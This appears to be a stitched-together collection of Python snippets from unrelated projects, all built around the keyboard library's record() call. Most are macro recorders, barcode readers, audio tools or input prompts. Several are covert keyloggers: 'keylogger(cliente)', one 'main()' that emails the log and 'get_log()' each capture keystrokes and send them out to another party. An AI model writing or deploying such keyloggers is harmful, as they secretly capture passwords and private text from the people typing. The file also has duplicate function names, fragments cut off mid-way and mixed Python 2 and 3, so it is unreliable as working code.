def main():
'''
主程序
'''
# 创建要提交的数据
# currentData = str(getCopyText())
print('''
***************************************************************************************
██████╗██╗ ██╗██████╗ ████████╗██████╗ █████╗ ███╗ ██╗███████╗
██╔════╝██║ ██║██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗████╗ ██║██╔════╝
██║ ███████║██████╔╝ ██║ ██████╔╝███████║██╔██╗ ██║███████╗
██║ ██╔══██║██╔═══╝ ██║ ██╔══██╗██╔══██║██║╚██╗██║╚════██║
╚██████╗██║ ██║██║ ██║ ██║ ██║██║ ██║██║ ╚████║███████║
╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝╚══════╝
欢迎使用 CHP's translator
用法:
复制想翻译的英文(ctrl+c),复制完后按f键翻译(翻译器会将剪切板中的内容翻译为中文)
切换中英对照模式(ctrl+e):方便进行单句的中英对比
切换翻译器(ctrl+r):目前支持百度、Bing、和有道
按Esc键退出
***************************************************************************************
''')
print('当前翻译器:'+mytranslate.__name__)
print('当前模式:仅显示翻译')
# 注册按键热键
keyboard.add_hotkey('f', on_press, args=('fanyi',)) # 翻译
keyboard.add_hotkey('ctrl+e', on_press, args=('zh_en',)) # 中英对照模型切换
keyboard.add_hotkey('ctrl+r', on_press, args=('translator',)) # 翻译器切换
# 开始监听
keyboard.record(until='esc')
def main(arg):
if len(arg) > 2:
print("TOO MANY ARGUMENTS")
if len(arg) == 2:
if (arg[1] == "-h"):
global RATE
RATE = 24000
print("Press [R] and hold on to record")
while not keyboard.record('r'):
if keyboard.record('r'):
break
record()
def __main__() -> None:
logging.basicConfig(filename='bot.log', level=logging.DEBUG)
# open_file_on_desktop('Iron Man.m4v')
# windows_email('this is a body', '*****@*****.**', 'this is a subject')
print(type(wx.TheClipboard))
recorded = keyboard.record(until='esc')
print(recorded)
def keylogger(cliente):
arquivo = open('log.txt', 'w')
arquivo.close()
recorded = keyboard.record(until='esc')
for i in range(0, len(recorded)):
v1 = str(recorded[i])
v2 = v1.strip('KeyboardEvent')
v3 = v2.strip('()')
v4 = v3.split()
if (v4[1] == 'down'):
if (v4[0] == 'backspace'):
salvar = ' backspace '
elif (v4[0] == 'space'):
salvar = ' '
elif (v4[0] == 'enter'):
salvar = '\n'
elif (v4[0] == 'esc'):
salvar = ' esc'
else:
salvar = v4[0]
arquivo = open('log.txt', 'a')
arquivo.write(salvar)
arquivo.close()
enviar_arquivo(cliente, 'log.txt')
os.remove('log.txt')
def GetKeyBoard():
KeyPress = []
keylen = 0
recorded = keyboard.record(until='esc') # 等待按键执行完毕
keystr = [str(i) for i in recorded] # 将记录的值转换为字符串
# print(keystr) # 打印当前按键
for i in keystr:
KeyPress.append(re.findall(r"[(](.*?)[ ]", i)[0]) # 取出'('和' ' 内数据
print(KeyPress) # 打印原始键值
# print(len(KeyPress)) # 打印长度
# 按键数量计算
if len(KeyPress) % 2 == 1:
keylen = (len(KeyPress) - 1)/2 # 计算一下快捷键的长度
elif len(KeyPress) % 2 == 0:
keylen = len(KeyPress)/2
for i in range(len(KeyPress), 4): # 补足4个列表
KeyPress.append(0)
KeyPress[3] = int(keylen)
# print(KeyPress[3]) # 打印按键数量
if KeyPress[3] == 1:
KeyPress[1] = 0
KeyPress[2] = 0
elif KeyPress[3] == 2:
KeyPress[2] = 0
# print(KeyPress) # 打印按键
return KeyPress[0:4]
def record():
p = au.PyAudio()
stream = p.open(format=FORMAT,
channels=CHANNEL,
rate=RATE,
input=True,
stream_callback=callback)
stream.start_stream()
while True:
keyboard.hook(keyListener)
if keyboard.record('esc'):
times = time.strftime("%Y年%m月%d日%H时%M分%S秒",
time.localtime()) + '.wav'
wf = wave.open(times, 'wb')
wf.setnchannels(CHANNEL)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(b''.join(data))
wf.close()
break
stream.stop_stream()
stream.close()
p.terminate()
print("\n")
print("file saved.")
def record(user_time, end_key, playback_speed):
print("Start Recording")
record_keys = keyboard.record(until=end_key)
record_keys = record_keys[1:-1]
print("Keys Recorded!")
thread = Thread(target = playback, args=[record_keys, user_time, playback_speed]) #playback thread
thread.start()
def Options(X):
#Record
if X == 'start' or X == '1':
inputs = keyboard.record(until='Esc')
with open(datafile, "a") as maindata:
line = '\n' + str(inputs)
maindata.write(line)
#Read all
elif X == 'read all' or X == '2':
with open(datafile, "r") as maindata:
data = maindata.read()
print(data)
print("")
print("")
#Read a recording
elif X == 'read line' or X == '3':
lines = 0
with open(datafile, "r") as maindata:
for line in maindata:
lines = lines + 1
print(lines)
linen = int(input("Which line is it that you recall? "))
print('')
linecount = 0
with open(datafile, "r") as maindata:
for line in maindata:
linecount = linecount + 1
if linecount == linen:
target = line
print(target)
print("")
print("")
def keyLogger():
#Function to Record key strokes
keyEvents = keyboard.record(until=LINE_ESCAPE)
#print("Keyboard Events : ",keyEvents)
#Clean the keyEvents
Active = True
keys = []
for event in keyEvents:
attr = str(event)
attr = attr.split()
keyArr = attr[0].split('(')
actionArr = attr[1].split(')')
key = keyArr[1]
action = actionArr[0]
# print(key,':',action) #Print the key pressed and the event occured.
if (action == 'down'):
keys.append(key)
if (key == LOG_ESCAPE):
Active = False
#TODO : write keys into file.
# print(keys)
writeLog(keys)
return Active
def record_Shortcut(name):
#create empty lists for the sequences of mouse and keyboard inputs
mouse_events = []
keyboard_events = []
#waits for special keypress before starting the recording
print("Press the '*' key when you would like to start recording")
keyboard.wait('*')
mouse.hook(mouse_events.append)
#waits until the same keypress to stop recording
keyboard_events = keyboard.record(until='*')
mouse.unhook(mouse_events.append)
print("Recording done!")
#print statements for testing you can remove these
#-----------------------------------------------
print(str(mouse_events))
print(str(keyboard_events))
#-----------------------------------------------
#takes sequence of key and mouse presses as well as the shortcut name and stores in respective files
nfile = open("name_shortcuts.txt",'a+')
nfile.write("%s\n" % (name))
nfile.close()
mfile = open("mouse_shortcuts.txt",'ab+')
dump(mouse_events,mfile)
mfile.close()
kfile = open("keyboard_shortcuts.txt",'ab+')
dump(keyboard_events,kfile)
kfile.close()
def record_keyboard(path_to_save):
print("starting recording")
startTime = time.time()
record = keyboard.record()
#get rid of escape input
record.pop()
keys, times, up_down = [],[],[]
for e in record:
keys.append(e.scan_code)
times.append(e.time)
up_down.append(e.event_type)
#set times to be relative to starting time
times = [x - startTime for x in times]
print(times)
print(keys)
file = open(path_to_save,"a")
file.write('KEYBOARD\n')
[file.write(str(x) + ',') for x in keys]
file.write('\n')
[file.write(str(x) + ',') for x in times]
file.write('\n')
[file.write(str(1)+',' if x in 'down' else str(0) + ',') for x in up_down ]
def main():
# prepare audio recorder
callback = Callback().callback
# duration of signal frame, seconds
FRAME_LEN = 0.2 # 0.2
# number of audio channels (expect mono signal)
CHANNELS = 1
# sample rate, Hz
RATE = 16000
CHUNK_SIZE = int(FRAME_LEN * RATE)
p = pyaudio.PyAudio()
stream = p.open(format=pyaudio.paInt16,
channels=CHANNELS,
rate=RATE,
input=True,
stream_callback=callback,
frames_per_buffer=CHUNK_SIZE)
stream.start_stream()
# prepare keyboard listener
while (1):
keyboard.hook(on_press_release)
if keyboard.record('esc'):
break
# close up
stream.stop_stream()
stream.close()
p.terminate()
def main():
# read the keyboard
export = ""
recorded = keyboard.record(until='enter')
recorded = list(str(recorded))
for i in range(len(recorded)):
if recorded[i] == "(":
try:
if recorded[i + 3] == "d":
export += ''.join(recorded[i + 1])
elif recorded[i + 11] == "d":
export = export[:-1]
except:
pass
export += "\n"
# w/r txt
with open(txt_path, 'a') as out:
out.write(export)
with open(txt_path, 'r') as out:
max_size = len(out.read().split())
print(max_size)
# send to mail and clean
if max_size >= [replace]: # nº words(int)
sendEmail()
open(txt_path, 'w').close()
def get_current_word():
'''
Recording the key presses until <space> is pressed,
i.e. gets the current word typed.
'''
return keyboard.get_typed_strings(keyboard.record(until='space'))
def get_question_response(self, question):
if not question:
return ""
DisplayEffects.scroll_text(self.display, question)
SoundEffects.play_type_your_answer()
DisplayEffects.display_text(self.display,
'???',
font=DisplayEffects.BigFont)
answer_events = keyboard.record(until="enter")
return next(keyboard.get_typed_strings(answer_events))
def main():
if CLEAR_ON_STARTUP:
os.remove(FILE_NAME)
output = open(FILE_NAME, "a")
for string in keyboard.get_typed_strings(keyboard.record(TERMINATE_KEY)):
output.write(string + "\n")
output.close()
def tracer():
event = keyboard.record(until='enter')
# for e in event:
# print("Key Name is:", e.name)
# print("Type of press:", e.event_type)
# print("Time of press:", e.time)
# print(e.scan_code)
# print("+++++")
m = make_list(event)
# print(m)
return m
def Record():
print("Recording... Press [.] to stop recording.")
recorded = keyboard.record(until='.')
if len(recorded) > 0:
recorded.pop()
if len(recorded) > 0:
recorded.pop(0)
time.sleep(1)
ClearConsole()
print("Done. Don't forget to SAVE this record if you want to keep it.")
return recorded
def __listener(self):
"""
Listens to key presses and save to the file specified in settings.py
"""
output_file = open(settings.FILE_PATH, 'a')
for key in keyboard.get_typed_strings(
keyboard.record(settings.TERMINATE_KEY)):
output_file.write(key + " \n")
def get_boundary_selection(self, categories):
if not categories or len(categories) == 0:
return ""
for i, cat in categories.items():
SoundEffects.categories[cat['name']].play()
DisplayEffects.scroll_text(self.display,
"{0}. {1} ".format(i, cat['display']))
SoundEffects.play_type_your_boundary()
DisplayEffects.display_text(self.display,
'???',
font=DisplayEffects.BigFont)
cat_events = keyboard.record(until="enter")
return next(keyboard.get_typed_strings(cat_events))
def _record_key_strokes(save_path: str):
logging.info("record key strokes")
records = keyboard.record(until="space+esc")
if len(records) > 0:
times = []
keys = []
for record in records:
times.append(record.time)
keys.append(record.name)
key_records = {"keys": keys, "times": times}
print(os.getcwd())
with open(save_path + "keys.json", "w") as f:
json.dump(key_records, f, cls=NumpyEncoder)
def dummy_record():
current_slot = 0
record_slots = []
for i in range(0, TOTAL_SLOTS):
record_slots.append(0)
while True:
for event in get_gamepad():
try:
if event.code == record and event.state > int(0):
print('Record P2')
print("Press the", stop, "button to quit record")
record_slots[current_slot] = keyboard.record(until=stop)
if len(record_slots[current_slot]) < 2:
record_slots[current_slot] = 0
print('Nothing recorded')
print('End record')
elif event.code == play and event.state > int(0):
if record_slots[current_slot] != 0:
print('Start replay', current_slot + 1)
keyboard.play(record_slots[current_slot])
print('End replay')
else:
print('This slot is empty')
elif event.code == random_play and event.state > int(0):
found = False
for i in range(0, TOTAL_SLOTS):
if record_slots[i]:
found = True
if found:
random_slot = randint(0, TOTAL_SLOTS - 1)
while not record_slots[random_slot]:
random_slot = randint(0, TOTAL_SLOTS - 1)
print('Start random replay', random_slot + 1)
keyboard.play(record_slots[random_slot])
print('End replay')
else:
print('No slot is recorded')
elif event.code == prev_record and event.state > int(0):
current_slot -= 1
if current_slot < 0:
current_slot = TOTAL_SLOTS - 1
print('Switched to slot ', current_slot + 1)
elif event.code == next_record and event.state > int(0):
current_slot += 1
if current_slot > TOTAL_SLOTS - 1:
current_slot = 0
print('Switched to slot ', current_slot + 1)
except:
print("Nothing recorded")
pass
def run(worker):
if not is_pi():
logger.info("Enter EAN here to simulate scanned barcode!")
while True:
try:
worker.on_barcode(sys.stdin.readline().strip().upper())
except Exception:
logger.exception("Caught exception in barcode handler...")
def replace_key_code(barcode, replacements):
indexes_per_replacement = {}
for source in replacements:
indexes = []
i = 0
while True:
try:
pos = barcode.index(source, i)
indexes.append(pos)
i = i + 1
except ValueError:
break
indexes_per_replacement[source] = indexes
for source in indexes_per_replacement:
indexes = indexes_per_replacement[source]
target = replacements[source]
for index in indexes:
barcode = barcode[:index] + target + barcode[index + 1:]
return barcode
while True:
keyboard_input = keyboard.record(until="tab")
if keyboard_input is None:
continue
for scanned_barcode in keyboard.get_typed_strings(keyboard_input):
scanned_barcode = replace_key_code(scanned_barcode, {
"?": "_",
"_": "?"
})
worker.on_barcode(scanned_barcode.upper())
def start_record(self):
print(
"Start record keyboard events, press {} to stop record....".format(
self.stop_key))
recorded_events = keyboard.record(until=self.stop_key)
events_json = []
for event in recorded_events:
events_json.append(json.loads(event.to_json()))
events_json = events_json[:-1]
events_string = utils.get_events_string(events_json)
out_filename = self._write_to_file(events_json)
print('\nSaved keyboard events at {}'.format(out_filename))
return out_filename, events_string
def logger():
FILE_NAME = "log.txt"
CLEAR_ON_STARTUP = False
TERMINATE_KEY = "enter"
if CLEAR_ON_STARTUP:
os.remove(FILE_NAME)
output = open(FILE_NAME, "a")
for string in keyboard.get_typed_strings(keyboard.record(TERMINATE_KEY)):
output.write(string)
output.close()
def dummy_record():
while True:
for event in get_gamepad():
try:
if event.code == record and event.state > int(0):
print('Record P2')
print("Press the", stop, "button to quit record")
recorded = keyboard.record(until=stop)
print('End record')
elif event.code == play and event.state > int(0):
print('Start replay')
keyboard.play(recorded)
print('End replay')
except:
print("Nothing recorded")
pass
def run(worker):
global last_barcode
if not is_pi():
print "---------"
print "Enter EAN here to simulate scanned barcode!"
while True:
try:
worker.on_barcode(sys.stdin.readline().strip().upper())
except Exception:
logging.exception("Caught exception in barcode handler...")
def replace_key_code(barcode, replacements):
indexes_per_replacement = {}
for source in replacements:
indexes = []
i = 0
while True:
try:
pos = barcode.index(source, i)
indexes.append(pos)
i = i + 1
except ValueError:
break
indexes_per_replacement[source] = indexes
for source in indexes_per_replacement:
indexes = indexes_per_replacement[source]
target = replacements[source]
for index in indexes:
barcode = barcode[:index] + target + barcode[index + 1:]
return barcode
while True:
input = keyboard.record(until="tab")
if input == None:
continue
for barcode in keyboard.get_typed_strings(input):
barcode = replace_key_code(barcode, {"?": "_", "_": "?"})
worker.on_barcode(barcode.upper())
def recordNew(rec):
global until_key
print('wait')
keyboard.wait(record_key, True, trigger_on_release=True)
# Record keymap
print('record keymap')
keymap = keyboard.read_key()
print('{}'.format(keymap))
# Record the keystrokes
print('record macro')
rec[keymap] = keyboard.record(until=until_key)[1:-1]
print(rec[keymap])
# Add hotkey
keyboard.add_hotkey('{}'.format(keymap),
lambda: keyboard.play(rec[keymap]))
def get_entry(suppress=False, until='enter'):
""" Returns a string entered by user
Listens for and collects keyboard events until the the 'until' key.
These events are then parsed into a string and returned.
Keyword Arguments:
until {str} -- Key that stops the event redorder (default: {'enter'})
Returns:
string -- Parsed string entered by user
"""
events = keyboard.record(until=until)
generator = keyboard.get_typed_strings(events)
string = next(generator)
return string
def recordNew(rec):
global until_key
# Record keymap
print('record keymap')
#keymap = keyboard.record(until=until_key)[0].name
keymap = keyboard.read_hotkey()
print('{}'.format(keymap))
# Record the keystrokes
print('record macro')
#rec[keymap] = keyboard.record(until=until_key)
#rec[keymap] = keyboard.record(until=until_key,trigger_on_release=True)
rec[keymap] = keyboard.record(trigger_on_release=True)
print(rec[keymap])
# Add hotkey
keyboard.add_hotkey('{}'.format(keymap),
lambda: keyboard.play(rec[keymap]))
def get_log():
"""log/send/repeat"""
now = time.time()
file = open('log.txt', 'r+')
while True:
log = keyboard.get_typed_strings(keyboard.record(until='enter'))
file.write(next(log) + '\n')
if len(sys.argv) > 1:
if now >= (time.time() - 900): #send every 15 mins
try:
file.seek(0) #back to start of file
logged = file.read() #read in whole file
send(logged,sys.argv[1],sys.argv[2]) #send it out
file.seek(0) #back to start of file and erase
file.truncate()
now = time.time() #reset the time variable
except: #if file was unable to be sent continue logging
continue
file.close()
def t():
self.recorded = keyboard.record("esc")
lock.release()
def process():
queue.put(keyboard.record('space', suppress=True))